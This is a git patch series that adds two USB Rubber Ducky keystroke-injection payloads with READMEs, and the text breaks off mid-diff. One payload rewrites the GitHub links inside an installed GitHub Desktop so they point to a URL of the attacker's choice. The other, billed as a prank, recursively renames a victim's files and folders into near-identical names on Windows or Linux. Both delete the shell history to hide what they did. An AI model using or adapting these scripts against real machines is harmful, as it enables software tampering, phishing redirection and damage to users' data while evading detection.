From 1fa6cea874f69279c5acf4661cb135223adad24e Mon Sep 17 00:00:00 2001 From: Alessandro Greco Date: Mon, 16 Sep 2024 14:30:19 +0200 Subject: [PATCH 01/15] [+] Replace Links In GithubDesktop This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. --- .../Replace_Links_In_GithubDesktop/README.md | 67 +++++++++++ .../payload.txt | 109 ++++++++++++++++++ 2 files changed, 176 insertions(+) create mode 100644 payloads/library/execution/Replace_Links_In_GithubDesktop/README.md create mode 100644 payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md b/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md new file mode 100644 index 0000000..cf9aaa8 --- /dev/null +++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md @@ -0,0 +1,67 @@ +# Replace Links In GithubDesktop + +This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user. + +## Table of Contents + +- [Features](#features) +- [Prerequisites](#prerequisites) +- [Usage](#usage) +- [Credits](#credits) + +## Features + +This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following: + +1. Detects the installation folder of GitHub Desktop. +2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer. +3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user. + +The script uses **PowerShell** to perform this replacement after detecting the operating system and target files. + +## Prerequisites + +- **Windows 10/11** +- **GitHub Desktop** installed on the machine. + +## Usage + +1. **Modify the script**: + - Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script: + ```duckyscript + DEFINE #NEW_LINK example.com + ``` + +2. **Customization**: + - Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly: + ```ducky + DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop + ``` + +3. **Execution**: + - Upon execution, the script will: + - Open PowerShell. + - Detect the GitHub Desktop installation directory. + - Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified. + +## Credits + +

Aleff :octocat:

+
+ + + + + +
+ + + +
Github + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt new file mode 100644 index 0000000..baf34d5 --- /dev/null +++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt @@ -0,0 +1,109 @@ +REM_BLOCK +##################################################### +# # +# Title : Replace Links In GithubDesktop # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10/11 # +# # +##################################################### +END_REM + + +REM REQUIRED - Define here the new url that will replace the original github link +DEFINE #NEW_LINK example.com + +REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default +DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop + + +REM_BLOCK + Credits: Hak5 LLC + Website: https://hak5.org/ + Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt +END_REM + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + + +GUI r +DELAY 1000 +STRINGLN PowerShell +DELAY 1000 + +STRINGLN + $path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY" + + $folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" } + + $versions = $folders | ForEach-Object { + [PSCustomObject]@{ + FolderName = $_.Name + Version = [version]($_.Name -replace "app-", "") + } + } + + $latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1 + + $latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName + $latestFolderPath += "\resources\app\" + $renderer = "renderer.js" + $main = "main.js" + + $filePath = "$latestFolderPath$renderer" + + $fileContent = Get-Content $filePath + $regex = [regex]'"(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"' + $modifiedContent = $fileContent -replace $regex, '#NEW_LINK' + Set-Content -Path $filePath -Value $modifiedContent + + + $filePath = "$latestFolderPath$main" + $fileContent = Get-Content $filePath + $regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)' + $modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")') + Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit + +END_STRINGLN \ No newline at end of file From 71d5eaf37807c03f35ba2f7d57b491444799d119 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 16 Sep 2024 14:42:11 +0200 Subject: [PATCH 02/15] Bug in renderer regex the link api.github.com needs to be correct --- .../execution/Replace_Links_In_GithubDesktop/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt index baf34d5..097750f 100644 --- a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt +++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt @@ -95,7 +95,7 @@ STRINGLN $filePath = "$latestFolderPath$renderer" $fileContent = Get-Content $filePath - $regex = [regex]'"(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"' + $regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)' $modifiedContent = $fileContent -replace $regex, '#NEW_LINK' Set-Content -Path $filePath -Value $modifiedContent @@ -106,4 +106,4 @@ STRINGLN $modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")') Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit -END_STRINGLN \ No newline at end of file +END_STRINGLN From 6e3f5924c02c008718beabe31e375113d68c0196 Mon Sep 17 00:00:00 2001 From: Alessandro Greco Date: Mon, 16 Sep 2024 14:43:00 +0200 Subject: [PATCH 03/15] Update payload.txt --- .../execution/Replace_Links_In_GithubDesktop/payload.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt index baf34d5..a76977e 100644 --- a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt +++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt @@ -95,7 +95,8 @@ STRINGLN $filePath = "$latestFolderPath$renderer" $fileContent = Get-Content $filePath - $regex = [regex]'"(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"' + $regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+) +' $modifiedContent = $fileContent -replace $regex, '#NEW_LINK' Set-Content -Path $filePath -Value $modifiedContent From b1fae99adebfc5988ea1a981182ad1169f6e2e8c Mon Sep 17 00:00:00 2001 From: Alessandro Greco Date: Mon, 16 Sep 2024 14:54:17 +0200 Subject: [PATCH 04/15] Update README.md --- .../library/execution/Replace_Links_In_GithubDesktop/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md b/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md index cf9aaa8..2595875 100644 --- a/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md +++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md @@ -2,6 +2,8 @@ This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user. +![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true) + ## Table of Contents - [Features](#features) From d3e494fd12a896f5100b805109fb78e43d122a13 Mon Sep 17 00:00:00 2001 From: Aleff Date: Wed, 18 Sep 2024 19:21:22 +0200 Subject: [PATCH 05/15] Rename Everything Similarly This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names. Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed. ![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true) > How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical. ![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true) > What it looks like instead if you turn on the extension view. --- .../Rename_Everything_Similarly/README.md | 116 +++++++++ .../Rename_Everything_Similarly/payload.txt | 220 ++++++++++++++++++ 2 files changed, 336 insertions(+) create mode 100644 payloads/library/prank/Rename_Everything_Similarly/README.md create mode 100644 payloads/library/prank/Rename_Everything_Similarly/payload.txt diff --git a/payloads/library/prank/Rename_Everything_Similarly/README.md b/payloads/library/prank/Rename_Everything_Similarly/README.md new file mode 100644 index 0000000..4bf4701 --- /dev/null +++ b/payloads/library/prank/Rename_Everything_Similarly/README.md @@ -0,0 +1,116 @@ +# Rename Everything Similarly + +This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names. + +Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed. + +![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true) + +> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical. + +![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true) + +> What it looks like instead if you turn on the extension view. + +# Index + +1. [Features](#features) +2. [Payload Structure](#payload-structure) + - [Conditional Target OS Execution](#conditional-target-os-execution) + - [PowerShell (Windows)](#powershell-windows) + - [Bash (GNU/Linux)](#bash-gnulinux) +3. [How to Use](#how-to-use) +4. [Why not MacOS?](#why-not-macos) +5. [Notes](#notes) +6. [Credits](#credits) + + +## Features +- **Cross-platform support**: The script can be executed on either **Windows** or **GNU/Linux** systems, based on the defined conditions, unfortunately it could not be published for macOS as well, [read more](#why-not-macos). +- **Recursive renaming**: It renames all directories and files inside a given directory, iterating through subdirectories. +- **Customizable**: Users can modify the base directory path and rename pattern as needed. + +## Payload Structure + +### Conditional Target OS Execution +The script detects (*from the DEFINE*) the target OS and adapts to either **Windows** or **GNU/Linux**: +- If the target system is **Windows**, the script will execute a PowerShell script. +- If the target system is **Linux**, it will execute a Bash script. + +### PowerShell (Windows) +For **Windows** systems, the script: +- Opens **PowerShell** and runs the `Rename-Directories` and `Rename-Files` functions. +- It renames directories by assigning sequential names like `d`, `dd`, etc., and files with names like `a`, `a `, `a `, followed by their respective file extensions. + +### Bash (GNU/Linux) +For **GNU/Linux** systems, the script: +- Opens a terminal and executes two Bash functions: `rename_directories` and `rename_files`. +- It performs similar renaming of directories and files, using `mv` to rename them with sequential names (like `d`, `dd`, etc... or `a`, `a `, `a ` etc...). + +## How to Use + +1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment: + - `#TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE`: Leave `TRUE` for **Windows** targets and change to `FALSE` for **GNU/Linux** targets. + + Ufortunately it could not be published for macOS as well, [read more](#why-not-macos). + + - `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash. + + Consider that the main route for Windows generally is `C:\Users\Username\` while for GNU/Linux systems it is something like `/home/username/` but in both cases if for istance you add `./Desktop/Hello/World/` you will go to the World folder in the path `C:\Users\Username\Desktop\Hello\World\` for Windows systems and `/home/username/Desktop/Hello/World/`. + + Of course, you have to make sure that this folder exists.... + + ![Windows command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/3.png?raw=true) + + > How Windows response to the command `cd ./Desktop/Hello/World/` + + ![Ubuntu command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/4.png?raw=true) + + > How Ubuntu response to the command `cd ./Desktop/Hello/World/` + + Consider the maximum length of file names on both Windows and GNU/Linux: + + - [Limit on file name length in bash \[closed\]](https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash) + + |=> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash + + - [On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)](https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap) + + |=> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap + +2. **Load Payload**: Upload the script to a USB Rubber Ducky device using the **DuckEncoder**. + +3. **Execute Payload**: Insert the USB Rubber Ducky into the target machine. + +## Why not MacOS? + +I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom. + +If I could know the behavior of this script on macOS (*which probably remains completely unchanged from use on GNU/Linux systems*) it could be optimized in that it could be reduced to a **WINDOWS_PASSIVE_DETECT** where if it is not Windows (*so generally GNU/Linux or macOS systems*) the bash script may be fine. + +## Notes +- Ensure that the specified directories exist on the target machine. +- Use with caution on sensitive systems, as the renaming process is recursive and may affect large directories. +- Contributions to add support for macOS are welcome. + +## Credits + +

Aleff :octocat:

+
+ + + + + +
+ + + +
Github + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/Rename_Everything_Similarly/payload.txt b/payloads/library/prank/Rename_Everything_Similarly/payload.txt new file mode 100644 index 0000000..8e05803 --- /dev/null +++ b/payloads/library/prank/Rename_Everything_Similarly/payload.txt @@ -0,0 +1,220 @@ +REM_BLOCK +################################################# +# # +# Title : Rename Everything Similarly # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10 # +# # +################################################# +END_REM + +REM %%%%% DEFINE-SECTION %%%%% +DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND . + +REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom. + +REM leave it TRUE if you want to run this script into a target that use Windows as OS, else if you want to run this script into a GNU/Linux system you must change it to FALSE. +DEFINE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE TRUE + +REM_BLOCK + + Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems. + + Of course, you have to make sure that this folder exists.... + + Payload Settings: + #DIRECTORY_WHERE_TO_RUN_THE_COMMAND - If you feel it is appropriate to run this script within a specific folder you will just need to change this definition. + + Consider the maximum length of file names on both Windows and GNU/Linux: + - Limit on file name length in bash [closed] + |-> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash + - On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified) + |-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap + +END_REM + +REM %%%%% PAYLOAD-SECTION %%%%% + +IF_DEFINED_TRUE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE + + REM_BLOCK + Credits: Hak5 LLC + Website: https://hak5.org/ + Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt + END_REM + + EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM + END_EXTENSION + + GUI r + DELAY 1000 + STRINGLN PowerShell + DELAY 1000 + + STRINGLN_POWERSHELL + cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND + + function Rename-Directories { + param ( + [string]$path, + [ref]$counter + ) + + $folders = Get-ChildItem -Path $path -Directory -Recurse | Sort-Object FullName -Descending + foreach ($folder in $folders) { + $newFolderName = "d" * $counter.Value # Crea il nuovo nome della cartella + $newFolderPath = $newFolderName + + $counter.Value++ + + Rename-Item -Path $folder.FullName -NewName $newFolderPath + Write-Host "Rinominata cartella: $($folder.FullName) -> $($newFolderPath)" + } + } + + function Rename-Files { + param ( + [string]$path, + [ref]$counter + ) + $files = Get-ChildItem -Path $path -File -Recurse + foreach ($file in $files) { + $newFileName = "a" + " " * $counter.Value # Crea il nuovo nome del file + $newFilePath = "$newFileName" + $file.Extension + + $counter.Value++ + + Rename-Item -Path $file.FullName -NewName $newFilePath + Write-Host "Rinominato file: $($file.FullName) -> $($newFilePath)" + } + } + + $counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit + END_STRINGLN + +ELSE_DEFINED + + REM_BLOCK + Credits: Hak5 LLC + Website: https://hak5.org/ + Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt + END_REM + + EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK + END_EXTENSION + + CTRL-ALT t + DELAY 1000 + + STRINGLN_BASH + cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND + + rename_directories() { + local path=$1 + local counter=$2 + + directories=$(find "$path" -type d | sort -r) + + for dir in $directories; do + new_folder_name=$(printf 'd%.0s' $(seq 1 "$counter")) # Crea il nuovo nome della cartella + new_folder_path="$path/$new_folder_name" + + counter=$((counter + 1)) + + mv "$dir" "$new_folder_path" + done + } + + rename_files() { + local path=$1 + local counter=$2 + + files=$(find "$path" -type f) + + for file in $files; do + extension="${file##*.}" + + new_file_name="a$(printf ' %.0s' $(seq 1 "$counter"))" + + new_file_path="$(dirname "$file")/$new_file_name" + + if [[ "$extension" != "$file" ]]; then + new_file_path="$new_file_path.$extension" + fi + + counter=$((counter + 1)) + + mv "$file" "$new_file_path" + done + } + + counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit + END_STRINGLN +END_IF_DEFINED \ No newline at end of file From 9c4257edbd7b2b678a7bfba32ef6bc43032e55f3 Mon Sep 17 00:00:00 2001 From: Aleff Date: Wed, 18 Sep 2024 19:22:27 +0200 Subject: [PATCH 06/15] Update README.md --- payloads/library/prank/Rename_Everything_Similarly/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/prank/Rename_Everything_Similarly/README.md b/payloads/library/prank/Rename_Everything_Similarly/README.md index 4bf4701..894892b 100644 --- a/payloads/library/prank/Rename_Everything_Similarly/README.md +++ b/payloads/library/prank/Rename_Everything_Similarly/README.md @@ -1,6 +1,6 @@ # Rename Everything Similarly -This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names. +This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names. Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed. From bb89731ae269e8093967cc888ccd33ca2b9735bf Mon Sep 17 00:00:00 2001 From: Aleff Date: Wed, 18 Sep 2024 19:27:12 +0200 Subject: [PATCH 07/15] Update payload.txt --- .../library/prank/Rename_Everything_Similarly/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/prank/Rename_Everything_Similarly/payload.txt b/payloads/library/prank/Rename_Everything_Similarly/payload.txt index 8e05803..b3b3114 100644 --- a/payloads/library/prank/Rename_Everything_Similarly/payload.txt +++ b/payloads/library/prank/Rename_Everything_Similarly/payload.txt @@ -5,7 +5,7 @@ REM_BLOCK # Author : Aleff # # Version : 1.0 # # Category : Prank # -# Target : Windows 10 # +# Target : Windows 10/11; GNU/Linux # # # ################################################# END_REM @@ -217,4 +217,4 @@ ELSE_DEFINED counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit END_STRINGLN -END_IF_DEFINED \ No newline at end of file +END_IF_DEFINED From f031b928a85abeccbdec619a5bbd98a17b9fec3d Mon Sep 17 00:00:00 2001 From: Aleff Date: Wed, 18 Sep 2024 19:28:22 +0200 Subject: [PATCH 08/15] Simple shifts in comments --- .../prank/Rename_Everything_Similarly/payload.txt | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/payloads/library/prank/Rename_Everything_Similarly/payload.txt b/payloads/library/prank/Rename_Everything_Similarly/payload.txt index b3b3114..fae58e9 100644 --- a/payloads/library/prank/Rename_Everything_Similarly/payload.txt +++ b/payloads/library/prank/Rename_Everything_Similarly/payload.txt @@ -10,14 +10,9 @@ REM_BLOCK ################################################# END_REM -REM %%%%% DEFINE-SECTION %%%%% -DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND . - REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom. -REM leave it TRUE if you want to run this script into a target that use Windows as OS, else if you want to run this script into a GNU/Linux system you must change it to FALSE. -DEFINE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE TRUE - +REM %%%%% DEFINE-SECTION %%%%% REM_BLOCK Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems. @@ -34,6 +29,10 @@ REM_BLOCK |-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap END_REM +DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND . + +REM leave it TRUE if you want to run this script into a target that use Windows as OS, else if you want to run this script into a GNU/Linux system you must change it to FALSE. +DEFINE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE TRUE REM %%%%% PAYLOAD-SECTION %%%%% From d934d9d4dec3ea04a36b1379eb086dbee6e350da Mon Sep 17 00:00:00 2001 From: Aleff Date: Wed, 18 Sep 2024 19:31:24 +0200 Subject: [PATCH 09/15] removed a debug print --- payloads/library/prank/Rename_Everything_Similarly/payload.txt | 1 - 1 file changed, 1 deletion(-) diff --git a/payloads/library/prank/Rename_Everything_Similarly/payload.txt b/payloads/library/prank/Rename_Everything_Similarly/payload.txt index fae58e9..5a2c70e 100644 --- a/payloads/library/prank/Rename_Everything_Similarly/payload.txt +++ b/payloads/library/prank/Rename_Everything_Similarly/payload.txt @@ -126,7 +126,6 @@ IF_DEFINED_TRUE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE $counter.Value++ Rename-Item -Path $file.FullName -NewName $newFilePath - Write-Host "Rinominato file: $($file.FullName) -> $($newFilePath)" } } From 9f1222ba0534ad94703c9a65704ce00d05f616ac Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 19 Sep 2024 19:55:47 +0200 Subject: [PATCH 10/15] Update payload.txt --- .../execution/Replace_Links_In_GithubDesktop/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt index 097750f..fa98a6c 100644 --- a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt +++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt @@ -73,7 +73,7 @@ DELAY 1000 STRINGLN PowerShell DELAY 1000 -STRINGLN +STRINGLN_POWERSHELL $path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY" $folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" } From 3cf199170c99cf690e7d65d92fea3cde280d96d7 Mon Sep 17 00:00:00 2001 From: Aleff Date: Sat, 21 Sep 2024 09:41:51 +0200 Subject: [PATCH 11/15] Update payload --- .../README.md | 8 +++-- .../payload.txt | 32 +++++++++++-------- 2 files changed, 23 insertions(+), 17 deletions(-) rename payloads/library/prank/{Rename_Everything_Similarly => Same_File_Name_Prank}/README.md (94%) rename payloads/library/prank/{Rename_Everything_Similarly => Same_File_Name_Prank}/payload.txt (89%) diff --git a/payloads/library/prank/Rename_Everything_Similarly/README.md b/payloads/library/prank/Same_File_Name_Prank/README.md similarity index 94% rename from payloads/library/prank/Rename_Everything_Similarly/README.md rename to payloads/library/prank/Same_File_Name_Prank/README.md index 894892b..09a7944 100644 --- a/payloads/library/prank/Rename_Everything_Similarly/README.md +++ b/payloads/library/prank/Same_File_Name_Prank/README.md @@ -1,4 +1,4 @@ -# Rename Everything Similarly +# Same File Name Prank This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names. @@ -50,9 +50,11 @@ For **GNU/Linux** systems, the script: ## How to Use 1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment: - - `#TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE`: Leave `TRUE` for **Windows** targets and change to `FALSE` for **GNU/Linux** targets. + - `DEFINE #TARGET_WINDOWS TRUE`: Leave **#TARGET_WINDOWS** to **TRUE** if the script will run on a Windows system. + + - `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE** if the script will run on a GNU/Linux system. - Ufortunately it could not be published for macOS as well, [read more](#why-not-macos). + - Ufortunately it could not be published for macOS as well, [read more](#why-not-macos). - `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash. diff --git 